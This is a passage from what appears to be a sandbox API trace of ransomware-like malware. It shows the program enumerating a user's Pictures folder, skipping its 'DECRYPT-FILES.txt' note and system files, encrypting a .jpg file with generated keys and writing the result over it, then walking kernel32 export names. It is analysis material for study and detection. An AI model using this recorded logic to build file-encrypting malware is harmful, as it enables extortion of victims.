returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" [0086.401] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\jkbimi8.tmp" [0086.401] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.401] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0086.402] CloseHandle (hObject=0x0) returned 0 [0086.402] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.402] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc02ec80, ftCreationTime.dwHighDateTime=0x1d4c52f, ftLastAccessTime.dwLowDateTime=0x60cc3ac0, ftLastAccessTime.dwHighDateTime=0x1d4d22f, ftLastWriteTime.dwLowDateTime=0x60cc3ac0, ftLastWriteTime.dwHighDateTime=0x1d4d22f, nFileSizeHigh=0x0, nFileSizeLow=0xd63f, dwReserved0=0x0, dwReserved1=0x0, cFileName="ltk0Cu1D.jpg", cAlternateFileName="")) returned 1 [0086.402] lstrcmpiW (lpString1="ltk0Cu1D.jpg", lpString2="DECRYPT-FILES.txt") returned 1 [0086.402] lstrcmpiW (lpString1="ltk0Cu1D.jpg", lpString2="autorun.inf") returned 1 [0086.402] lstrcmpiW (lpString1="ltk0Cu1D.jpg", lpString2="boot.ini") returned 1 [0086.402] lstrcmpiW (lpString1="ltk0Cu1D.jpg", lpString2="desktop.ini") returned 1 [0086.402] lstrcmpiW (lpString1="ltk0Cu1D.jpg", lpString2="ntuser.dat") returned -1 [0086.402] lstrcmpiW (lpString1="ltk0Cu1D.jpg", lpString2="iconcache.db") returned 1 [0086.402] lstrcmpiW (lpString1="ltk0Cu1D.jpg", lpString2="bootsect.bak") returned 1 [0086.402] lstrcmpiW (lpString1="ltk0Cu1D.jpg", lpString2="ntuser.dat.log") returned -1 [0086.402] lstrcmpiW (lpString1="ltk0Cu1D.jpg", lpString2="thumbs.db") returned -1 [0086.402] lstrcmpiW (lpString1="ltk0Cu1D.jpg", lpString2="Bootfont.bin") returned 1 [0086.402] lstrlenW (lpString="ltk0Cu1D.jpg") returned 12 [0086.402] lstrcmpiW (lpString1="jpg", lpString2="lnk") returned -1 [0086.402] lstrcmpiW (lpString1="jpg", lpString2="exe") returned 1 [0086.402] lstrcmpiW (lpString1="jpg", lpString2="sys") returned -1 [0086.402] lstrcmpiW (lpString1="jpg", lpString2="dll") returned 1 [0086.402] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned 45 [0086.402] lstrlenW (lpString="ltk0Cu1D.jpg") returned 12 [0086.402] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" [0086.402] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpString2="ltk0Cu1D.jpg" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\ltk0Cu1D.jpg") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\ltk0Cu1D.jpg" [0086.402] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.403] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\ltk0Cu1D.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\ltk0cu1d.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0086.403] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=54847) returned 1 [0086.403] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0086.403] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0086.403] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0086.403] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0086.403] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0086.403] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0086.404] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0086.406] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.406] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0086.407] CloseHandle (hObject=0x42c) returned 1 [0086.407] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.407] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0086.408] CloseHandle (hObject=0x0) returned 0 [0086.408] CloseHandle (hObject=0x428) returned 1 [0086.408] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.408] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.408] GetTickCount () returned 0x114e0de [0086.408] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.409] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0086.409] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0086.409] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0086.409] lstrlenA (lpString="kernel32.dll") returned 12 [0086.409] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0086.409] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0086.409] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0086.409] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0086.409] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0086.409] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0086.409] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0086.409] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0086.410] lstrlenA (lpString="ADDATOMA") returned 8 [0086.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0086.410] lstrlenA (lpString="ADDATOMW") returned 8 [0086.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0086.410] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0086.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0086.410] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0086.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0086.410] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0086.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0086.410] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0086.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0086.410] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0086.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0086.410] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0086.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0086.410] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0086.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0086.410] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0086.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0086.410] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0086.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0086.410] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0086.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0086.410] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0086.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0086.410] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0086.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0086.410] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0086.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0086.410] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0086.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0086.410] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0086.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0086.410] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0086.410] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0086.411] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0086.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0086.411] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0086.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0086.411] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0086.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0086.411] lstrlenA (lpString="BACKUPREAD") returned 10 [0086.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0086.411] lstrlenA (lpString="BACKUPSEEK") returned 10 [0086.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0086.411] lstrlenA (lpString="BACKUPWRITE") returned 11 [0086.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0086.411] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0086.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0086.411] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0086.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0086.411] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0086.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0086.411] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0086.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0086.411] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0086.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0086.411] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0086.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0086.411] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0086.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0086.411] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0086.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0086.411] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0086.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0086.411] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0086.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0086.411] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0086.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0086.411] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0086.411] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0086.412] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0086.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0086.412] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0086.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0086.412] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0086.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0086.412] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0086.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0086.412] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0086.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0086.412] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0086.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0086.412] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0086.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0086.412] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0086.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0086.412] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0086.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0086.412] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0086.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0086.412] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0086.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0086.412] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0086.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0086.412] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0086.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0086.412] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0086.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0086.412] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0086.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0086.412] lstrlenA (lpString="BEEP") returned 4 [0086.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0086.412] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0086.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0086.412] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0086.412] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0086.413] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0086.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0086.413] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0086.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0086.413] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0086.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0086.413] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0086.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0086.413] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0086.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0086.413] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0086.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0086.413] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0086.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0086.413] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0086.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0086.413] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0086.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0086.413] lstrlenA (lpString="CANCELIO") returned 8 [0086.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0086.413] lstrlenA (lpString="CANCELIOEX") returned 10 [0086.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0086.413] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0086.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0086.413] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0086.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0086.413] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0086.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0086.413] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0086.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0086.413] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0086.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0086.413] lstrlenA (lpString="CHECKELEVATION") returned 14 [0086.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0086.413] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0086.413] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0086.414] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0086.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0086.414] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0086.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0086.414] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0086.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0086.414] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0086.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0086.414] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0086.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0086.414] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0086.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0086.414] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0086.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0086.414] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0086.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0086.414] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0086.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0086.414] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0086.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0086.414] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0086.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0086.414] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0086.414] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0086.414] lstrlenA 